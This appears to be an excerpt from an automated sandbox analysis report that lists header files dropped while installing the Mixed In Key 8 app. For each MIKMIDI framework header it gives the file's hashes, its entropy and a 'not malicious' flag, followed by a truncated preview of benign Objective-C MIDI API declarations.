Preview:	//.// MIKMIDIChannelPressureEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/4/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A channel pressure (aftertouch) event.. . This event is different from MIKMIDIPolyphonicKeyPressureEvent.. * This event is used to indicate the single greatest pressure value. * (of all the current depressed keys).. /.@interface MIKMIDIChannelPressureEvent : MIKMIDIChannelEvent../. The pressure of the event. From 0-127.. /.@property (nonatomic, readonly) UInt8 pressure;..@end../. The mutable counter part of MIKMIDIChannelPressureEvent. /.@interface MIKMutableMIDIChannelPressureEvent : MIKMIDIChannelPressureEvent..@property (nonatomic, readwrite) UInt8 pressure;..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, strong, readwrite, null_resettable) NSMutableData data;.@property (no

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_SVBWfL Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	997
Entropy (8bit):	5.279979213885782
Encrypted:	false
SSDEEP:	12:ZBubzFbMXvnP4kZqSCrCtHKqrzNkg2dJyW7YRheV2dJ0V18PsoqhGgZ:ZAbZc3ZUtrkHVrivk5c18UDhGgZ
MD5:	3F6954DC2941E0EAFB1444186C7D3E9A
SHA1:	A6F1E8FEB35DA8E986A3D41724128321227AF0F8
SHA-256:	D62F64A355070C199D0D45E59CCC3D3318F1F5516B404BFE339D0953F161E180
SHA-512:	0C59E4309889EA0379FA129665A9BFD4C80DD1AC7D068687E4C4181C4D62A82860514C22EA286E6EE17647A1CEF9EE430BF660C36145CA6F0D554CFDFF0DF6C2
Malicious:	false
Preview:	//.// MIKMIDISynthesizer_SubclassMethods.h.// MIKMIDI.//.// Created by Andrew Madsen on 2/26/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDISynthesizer.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN..@interface MIKMIDISynthesizer ()..- (BOOL)sendBankSelectAndProgramChangeForInstrumentID:(MusicDeviceInstrumentID)instrumentID error:(NSError *)error;..@property (nonatomic, readwrite, nullable) AudioUnit instrumentUnit;.@property (nonatomic, copy) OSStatus (^sendMIDICommand)(MIKMIDISynthesizer synth, MusicDeviceComponent inUnit, UInt32 inStatus, UInt32 inData1, UInt32 inData2, UInt32 inOffsetSampleFrame);..@end..FOUNDATION_EXPORT OSStatus MIKMIDISynthesizerScheduleUpcomingMIDICommands(MIKMIDISynthesizer synth,................... AudioUnit _Nullable instrumentUnit,................... UInt32 inNumberFrames,................... Float64 sampleRate,................... const AudioTimeStamp inTimeStamp);..NS_ASSUME_NONNULL_END.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_VCe8V0 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	761
Entropy (8bit):	5.12711187949223
Encrypted:	false
SSDEEP:	12:ZhywvUNXbwY8vnPvohlvu13yw/hY1SAF7yw+6yw/hywOKT3Kshky0FQz8e6:ZhjMw73Ah1UjhLg7S6jhLw
MD5:	33F4A38707F2A08CD655754653B6D9E0
SHA1:	9EF2DA1B345EB98B277BF358D7C1610B13E9F81B
SHA-256:	E2FF4B77AEBDA5C0557EAAC73CCFB17E8C5647D4456C18993D76A04561B6B34D
SHA-512:	7697C8C60DB0185A0BF73FEB68EAAC6A8A2D32A52788ADFBC04D853F4A8CA3AF1B62947AE328BB55FD504AB65CC1D50B4EFBA6BDA30D7BD7128C0C19744909D2
Malicious:	false
Preview:	//.// MIKMIDIMetaCopyrightEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A meta event containing copyright information.. /.@interface MIKMIDIMetaCopyrightEvent : MIKMIDIMetaTextEvent..@end../. The mutable counterpart of MIKMIDIMetaCopyrightEvent.. /.@interface MIKMutableMIDIMetaCopyrightEvent : MIKMIDIMetaCopyrightEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData metaData;..@end..NS_ASSUME_NONNULL_END

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_VUEVVN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	4.9893869199148435
Encrypted:	false
SSDEEP:	48:Kb1NKcKuMVA8GXPnZxoGVTmOYSZ2h6CVG40GH/KjuMVA+nZxoGVTmd:KJNKcoIPbtmTSZ6rqldbtmd
MD5:	4F7FBA098972D3FCD295AB1E6918D81C
SHA1:	8224E34636B02BEBD76A1014F2BD1CC91A382DAD
SHA-256:	6438B56E3F28E3A4BF06F305CA0DB6D596078F1677992C53BA5E8626D68CAF44
SHA-512:	879D8BE5DF6905B57DE7024F683A523E98009642DC4805932C8086F82FD83D7FEB75D780DE62BAD4E928B2399B0D1E9D93A5705ED6C9EC3705E7604940F255A8
Malicious:	false
Preview:	//.// MIKMIDISynthesizerInstrument.h.// MIKMIDI.//.// Created by Andrew Madsen on 2/19/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDISynthesizerInstrument is used to represent. /.@interface MIKMIDISynthesizerInstrument : NSObject../. Creates and initializes an MIKMIDISynthesizerInstrument with the corresponding instrument ID.. . @param instrumentID The MusicDeviceInstrumentID for the desired MIKMIDISynthesizerInstrument. * @param name The human readable name of the instrument. . . @return A MIKMIDISynthesizerInstrument instance with the matching instrument ID, or nil if no instrument was found.. /.+ (nullable instancetype)instrumentWithID:(MusicDeviceInstrumentID)instrumentID name:(nullable NSString )name;../*. The human readable name of the receiver. e.g. "Piano 1".. */.@property (n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_X1w1iZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	9319
Entropy (8bit):	4.811788918106093
Encrypted:	false
SSDEEP:	192:Vf5/+bRf3SxLfhSrL4LYKsBpanxralQetna1ird/cwtrugrL/X4t9ON36Nheus6p:/Srusexp4FiaXuhKi
MD5:	583961E3724323562EBDD9224D286FCF
SHA1:	5A4D206362FA8D8AE446DA1C3AC49C44E1D9AEDA
SHA-256:	5657DF6629DCF41DE21350CABE5CB377B388746D59DC1C2DA8D01E341186BA1C
SHA-512:	11A91DEBFC7B2241E21DF943DD34F512CEAD4F958DEE19BFC98A9016DEE28A9976D76602A5A9BD0522F0A9BB6E9044E1067CDC338F3CDFF4B79C5124841CDFE3
Malicious:	false
Preview:	//.// MIKMIDIDeviceManager.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDIInputPort.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIDevice;.@class MIKMIDISourceEndpoint;.@class MIKMIDIClientSourceEndpoint;.@class MIKMIDIDestinationEndpoint;.@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN..// Notifications./*. Posted whenever a device is added (connected) to the system.. /.extern NSString const MIKMIDIDeviceWasAddedNotification;../*. Posted whenever a device is removed (disconnected) from the system.. /.extern NSString const MIKMIDIDeviceWasRemovedNotification;../*. Posted whenever a virtual endpoint is added to the system.. /.extern NSString const MIKMIDIVirtualEndpointWasAddedNotification;../*. Posted whenever a virtual endpoint is removed from the system.. /.extern NSString const MIKMIDIVirtualEndpointWasRemovedNotifica

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Xlbe46 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	592
Entropy (8bit):	5.119179529415619
Encrypted:	false
SSDEEP:	12:Z/c9sbzgJUzbAUvsGSfnsacMY0TgXhELn1XXiLuYg5l/1wK752E:Z/Usbx31vnBaKWgXaLn1H+g5l/1wKx
MD5:	AE1D683DF3D4C0B163A230203727035A
SHA1:	B73A92CD45BD0390ED48453754B4A420DE637BE4
SHA-256:	00D9CA1D434AFE28967AC80745A26D4A525F4C991BCD8E8A528047DDF08F39DC
SHA-512:	E482577ED858184A5A755F5370C7E3D627C242E43ABE2E9F6F6A80F534E383B6AE914EFC97D671D89DAA3543F2648A85F44A9FB30C83DDE585AB6DCA7645A137
Malicious:	false
Preview:	//.// MIKMIDITransmittable.h.// MIKMIDI.//.// Created by Andrew Madsen on 2/7/18..// Copyright . 2018 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>..NS_ASSUME_NONNULL_BEGIN..@protocol MIKMIDITransmittable <NSObject>..@optional./. Some MIDI commands, e.g. 14-bit MIKMIDIControlChangeCommands, need to be split into multiple MIDI messages or otherwise transformed before sending through an output port. This method should return an array of command(s) to be sent to represent the receiver.. /.- (NSArray *)commandsForTransmission;..@end..NS_ASSUME_NONNULL_END.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_YW0fEw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	4.983519165912661
Encrypted:	false
SSDEEP:	48:bbtYRQQIW/Gz8rRhw97GiLPiZyClH6zji7hPSacdzjSi4g3L:bbaQQjgARILiZs2vIgg7
MD5:	F01ADF7F29B5BF586D7BA4912C16EE29
SHA1:	9EE8FBA51D9AE4EE60546099FAFDBDFCAB594FC0
SHA-256:	E2F5240EF47C6CD6BE16D641238AD08DD491FA335D1EF839167AD7971E2345A9
SHA-512:	04D3BA19DBF70A585DDC614592C01A3A4513CC79BE6969A6D30E85696C85A444214F2D7DC21AB9FE5C958F84C9FDF0FE395286B3E47E882A1C8601DF73D8C920
Malicious:	false
Preview:	//.// MIKMIDISourceEndpoint.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIEndpoint.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDISourceEndpoint;.@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../*. Block used by various MIKMIDI APIs that deliver incoming MIDI messages.. . @param source.The source endpoint from which MIDI messagse were received.. * @param commands.An NSArray containing received MIKMIDICommand instances.. /.typedef void(^MIKMIDIEventHandlerBlock)(MIKMIDISourceEndpoint source, MIKArrayOf(MIKMIDICommand ) commands); // commands in an array of MIKMIDICommands../*. MIKMIDISourceEndpoint represents a source (input) MIDI endpoint.. * It is essentially an Objective-C wrapper for instances of CoreMIDI's MIDIEndpoint class. * which are kMIDIObjectType_Source type endpoints.. . MIDI source endpoints are contained by MIDI entities, which are in turn con

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Yj1cLZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	5.180786767437297
Encrypted:	false
SSDEEP:	24:ZmjhtYlJBP3Mdv1TV+N0mUFkt4ULHBacnN450PXQKD53QNpxyqLMKm70XM+/3pLo:AttYFPCxo2zuhacnXT4QqLMKm70XM+/e
MD5:	F9F618536C1501D279668614E0DA8F69
SHA1:	2ACD5787AFBED530CD3B81B0E70F49AE3941BFB2
SHA-256:	83C1645E67FE53B76FE53B4AA0765A793A8780BEBAEFB27ABC75805CCE52CDC2
SHA-512:	5C6FF8B16B7EC2D43B6374A4A675A6573DA26B34B5FE369DD40E118EA1122F56BFC7BEE07933BC02F6447445B357932DFF4F2BF0D099168C52853B0B9D29A8A9
Malicious:	false
Preview:	//.// MIKMIDIInputPort.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIPort.h".#import "MIKMIDISourceEndpoint.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIEndpoint;.@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../*. MIKMIDIInputPort is an Objective-C wrapper for CoreMIDI's MIDIPort class, and is only for source ports.. * It is not intended for use by clients/users of of MIKMIDI. Rather, it should be thought of as an. * MIKMIDI private class.. /.@interface MIKMIDIInputPort : MIKMIDIPort..- (id _Nullable)connectToSource:(MIKMIDISourceEndpoint )source....... error:(NSError *)error..... eventHandler:(MIKMIDIEventHandlerBlock)eventHandler;.- (void)disconnectConnectionForToken:(id)token;..@property (nonatomic, strong, readonly) MIKArrayOf(MIKMIDIEndpoint ) connectedSources;..@property (nonatomic) BOOL coalesces14BitControlChangeCommands; // Default is YES../. Time be

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Z9xX8s Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	10292
Entropy (8bit):	4.9394195792990985
Encrypted:	false
SSDEEP:	192:HtPRS5R0Ex2HtMDpKrtR3IDWHYo1dCbxp5vz+wN+u0:VRYR8tZrtR3QWHzwF7+4+u0
MD5:	C1B05D647DE11E53D9C524BB41BE319A
SHA1:	58C87EA53B2505143DC0987B440130B18C0498B1
SHA-256:	8511C197F49E0E0E0DE99FED91EF0023D72445F0CE2B8354B5928345A6FC2DA1
SHA-512:	0AC71B654A9AAFF9E378987C501F8B3747D1346BCEF742D325E4904ABA10AA8D663328319B6BB92D0549A57C9313C31BAE896DFD6F1097263F6D3F1DFA541148
Malicious:	false
Preview:	//.// MIKMIDIMapping.h.// Energetic.//.// Created by Andrew Madsen on 3/15/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..#import "MIKMIDICommand.h".#import "MIKMIDIResponder.h"..@protocol MIKMIDIMappableResponder;..@class MIKMIDIChannelVoiceCommand;.@class MIKMIDIMappingItem;..NS_ASSUME_NONNULL_BEGIN../*. Overview. * --------. . MIKMIDIMapping includes represents a complete mapping between a particular hardware controller,. * and an application's functionality. Primarily, it acts as a container for MIKMIDIMappingItems,. * each of which specifies the mapping for a single hardware control.. . MIKMIDIMapping can be stored on disk using a straightforward XML format, and includes methods. * to load and write these XML files. Currently this is only implemented on OS X (see . * https://github.com/mixedinkey-opensource/MIKMIDI/issues/2 ).. . Another class, MIKMIDIMappingManag

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ZJTPRD Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	16430
Entropy (8bit):	4.902851055273436
Encrypted:	false
SSDEEP:	192:CIfF/AW9W3Za9qHw7ekz/JND5/4qyweLkigkejN2O5XaDhDlCf6rr8/VwtzxwfDd:KAWI9JptyDejN4Ukur
MD5:	7B5B40BEFFB5669E8E522937FB28C715
SHA1:	63C221C65959B045C5F8847B73B96770EDCB8EEF
SHA-256:	496683693EDF28F0CAE3C3BC029EB9E4EDC78EF3254100AB9BD752E487236E1F
SHA-512:	1ED481709425B425AF002332FD4F64A39E2059A08B7D23132C7823E8EC60F0EF5F62A67C4FEE31E708CBAD8CF8C86D8B076F5D5234364CB2D97DDEDBFE618CBD
Malicious:	false
Preview:	//.// MIKMIDISequencer.h.// MIKMIDI.//.// Created by Chris Flesner on 11/26/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDISequence;.@class MIKMIDITrack;.@class MIKMIDIMetronome;.@class MIKMIDICommand;.@class MIKMIDIDestinationEndpoint;.@class MIKMIDISynthesizer;.@class MIKMIDIClock;.@protocol MIKMIDICommandScheduler;../*. Types of click track statuses, that determine when the click track will be audible.. . @see clickTrackStatus. /.typedef NS_ENUM(NSInteger, MIKMIDISequencerClickTrackStatus) {../* The click track will not be heard during playback or recording. /..MIKMIDISequencerClickTrackStatusDisabled,../* The click track will only be heard while recording. /..MIKMIDISequencerClickTrackStatusEnabledInRecord,../* The click track will only be heard while recording and while the playback position is still in the pre-roll. */

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ZOEHvE Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	751
Entropy (8bit):	5.0979009304204155
Encrypted:	false
SSDEEP:	12:Zh2ixUNXbw0vnPvohlvR3Kj13pthtSAF7p06pthpQKT3Kshky0FQz8e6:ZhDMw03Ah1R3KRbh0g766bhTw
MD5:	B461DB006073A1025084E4E6709ED3CE
SHA1:	0B8123AB06A2874C560BDB4FB4ABEEFD5F59DCCF
SHA-256:	3751871312CC3A6F29FD798941AFB324617E9415BFA5E0548E1299232B245E57
SHA-512:	9D8CE75CB82E1BAABBF2E55543B4371EF626592AC03A89648B96388A88067200396CCC0EEBDA7677E288F6667A138E661EA381D52FA79C5B6AFFD5F19FE8D896
Malicious:	false
Preview:	//.// MIKMIDIMetadataSequenceEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A meta event containing sequence information.. /.@interface MIKMIDIMetaSequenceEvent : MIKMIDIMetaEvent..@end../. The mutable counterpart of MIKMIDIMetaSequenceEvent.. /.@interface MIKMutableMIDIMetaSequenceEvent : MIKMIDIMetaSequenceEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData metaData;..@end..NS_ASSUME_NONNULL_END

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_a3GhaG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	6151
Entropy (8bit):	4.900118130815014
Encrypted:	false
SSDEEP:	192:Z3TpdHQt+exEQWGkVZ1BrvkynWvo6ovgbmvQqMfwep5N82fwoYY:lLHQAeKQjA1BrvkymqMnHN82kY
MD5:	212500E85B211D2165EA7E547A86F01A
SHA1:	A9D010885D03421E7F7CCD8A97C69F0BAE64CD57
SHA-256:	70B8194DF998B6AA472B59A96E8992D87AF6B04ADA0358374DC55FEDCA087654
SHA-512:	E80976922510115C2686B4E43C77E49D3E75D53052EAB89FEDA03A8F83B004BD74242ED71DFE29C79BFC3F0A14539751B340C15BEBD51CF070B8B4B5FD68D40F
Malicious:	false
Preview:	//.// MIKMIDIControlChangeCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A MIDI control change message.. /.@interface MIKMIDIControlChangeCommand : MIKMIDIChannelVoiceCommand../. Convenience method for creating a standard control change command instance. Can only be used to create a standard 7-bit command... @param controllerNumber The MIDI control number for the command.. @param sevenBitValue The controlValue of the command. Only the lower 7 bits of this are used.. @return An initialized MIKMIDIControlChangeCommand instance.. /.+ (instancetype)controlChangeCommandWithControllerNumber:(NSUInteger)controllerNumber value:(NSUInteger)sevenBitValue;../**. Convenience method for creating a 14-bit control change command instance.. . @param controllerNumber The MIDI control number for the co

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_aXjYAP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	756
Entropy (8bit):	5.113568844719289
Encrypted:	false
SSDEEP:	12:ZhpUNXbwY8vnPvohlvG13VhY1SAF7s6VhoKT3Kshky0FQz8e6:ZhpMw73Ah18VhLg7s6VhVw
MD5:	8ABF9BF30CE0783905EEC0FD72A97D07
SHA1:	3C4D93A8A01E95314B1078033A50D9CAAF90B7A2
SHA-256:	9CAA49B80D686AE33A7033A6EF68FFBE98B01CFEB71743557C693F49A07136D6
SHA-512:	FB229AD4E4727B4F480C317043003AD05B9C9B4C0781A0C0DD7CA5B9004C0F9F996BE75109D0292F42456B9B31EF703C70A179FF7405593ECAD9CE1830ABB8CD
Malicious:	false
Preview:	//.// MIKMIDIMetaCuePointEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../*. A meta event containing cue point information.. /.@interface MIKMIDIMetaCuePointEvent : MIKMIDIMetaTextEvent..@end../. The mutable counterpart of MIKMIDIMetaCuePointEvent.. /.@interface MIKMutableMIDIMetaCuePointEvent : MIKMIDIMetaCuePointEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData metaData;..@end..NS_ASSUME_NONNULL_END

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_apoMvq Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	7772
Entropy (8bit):	4.850138454865408
Encrypted:	false
SSDEEP:	96:JcNGtvowMTZufQEy7+yAH4bnjBsuTHbWy:JIGSZuY7SyAH47dP7Wy
MD5:	7A78AABE08224EA892B2D71FF66F3891
SHA1:	A3EB0B9BB9D740CB6E2208B1499F502CE94D8730
SHA-256:	E8B6BC0F01A10682AFF1BEF1C8F681DD1B109406B1A8A3129663D976C7C85A5E
SHA-512:	BAAEAAF3861339106EE604BD2A8F7919AEA321B33E300E72C903AE802D81983A96EBA12D0D2ED2A44F802B814E73923FB97726A93258866F96B7AADADEA710E4
Malicious:	false
Preview:	//.// MIKMIDIClock.h.// MIKMIDI.//.// Created by Chris Flesner on 11/26/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"../*. Returns the number of MIDITimeStamps that would occur during a specified time interval.. . @param timeInterval The number of seconds to convert into number of MIDITimeStamps.. . @return The number of MIDITimeStamps that would occur in the specified time interval.. /.Float64 MIKMIDIClockMIDITimeStampsPerTimeInterval(NSTimeInterval timeInterval);../. Returns the number of seconds per each MIDITimeStamp.. . @return Then number of seconds per each MIDITimeStamp.. /.Float64 MIKMIDIClockSecondsPerMIDITimeStamp(void);..NS_ASSUME_NONNULL_BEGIN../. MIKMIDIClock provides the number of seconds per MIDITimeStamp, as well as the. * number of MIDITimeStamps per a specified time interval.. . Instances of MIKMIDICl

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_auGEj1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	8401
Entropy (8bit):	5.034324563697656
Encrypted:	false
SSDEEP:	192:Dav3k9RSIsEauU3fS6rSYXVQGSuRVQ7qeVW:yU90IsEi3a6mYXSuSqeVW
MD5:	0D3ECDB4B71F50E25AB116C48E61D33B
SHA1:	558DEB0B669F550267ABDC4860C9949CA0C2A45F
SHA-256:	D5D371DEF3381F91405D6144833AAFA8B088D568523CE0C5039AEF9B3A63F13B
SHA-512:	B33C6A759C504B52E6825EF1789DFD3C60930222B857C06F58872B422E7FB39EF26B1A306FF4577636A321161A33D0C108A6AAC687DC7260B3F36EBFFD53888D
Malicious:	false
Preview:	//.// MIKMIDIEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/21/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"../*. Types of MIDI events. These values are used to determine which subclass to. * instantiate when creating a new MIDI event.. . @note These are similar, but do not directly correspond to the values of MusicEventType. /.typedef NS_ENUM(NSUInteger, MIKMIDIEventType).{. MIKMIDIEventTypeNULL = kMusicEventType_NULL,..MIKMIDIEventTypeExtendedNote = kMusicEventType_ExtendedNote,..MIKMIDIEventTypeExtendedTempo = kMusicEventType_ExtendedTempo,..MIKMIDIEventTypeUser = kMusicEventType_User,..MIKMIDIEventTypeMeta = kMusicEventType_Meta, / See subtypes below /..MIKMIDIEventTypeMIDINoteMessage = kMusicEventType_MIDINoteMessage,..MIKMIDIEventTypeMIDIChannelMessage = kMusicEventType_MIDIChannelMessage, / See subtypes below

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_bfGAmC Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	3860
Entropy (8bit):	4.846368662909332
Encrypted:	false
SSDEEP:	96:sNWyuA191zzJ+9yZ5nNMNLLOUIfYGTcBo:ASKDzp95
MD5:	16035AE1DF42D3AF2C669ECABA04D2FB
SHA1:	14FDF8E12921ACF92987557C0BB7CCC666C95F5E
SHA-256:	20526E9C18C019BA1175856097A87010EAED06E3E790AEB2587E90C54C086F34
SHA-512:	FEC35C3693483D3637639454641929E679F543E1C708D527294DFEB1715C7652314E93E88C84F72526D9B94BE24088AFDFD6D55680F240F7FB8CAAA8EB0C737E
Malicious:	false
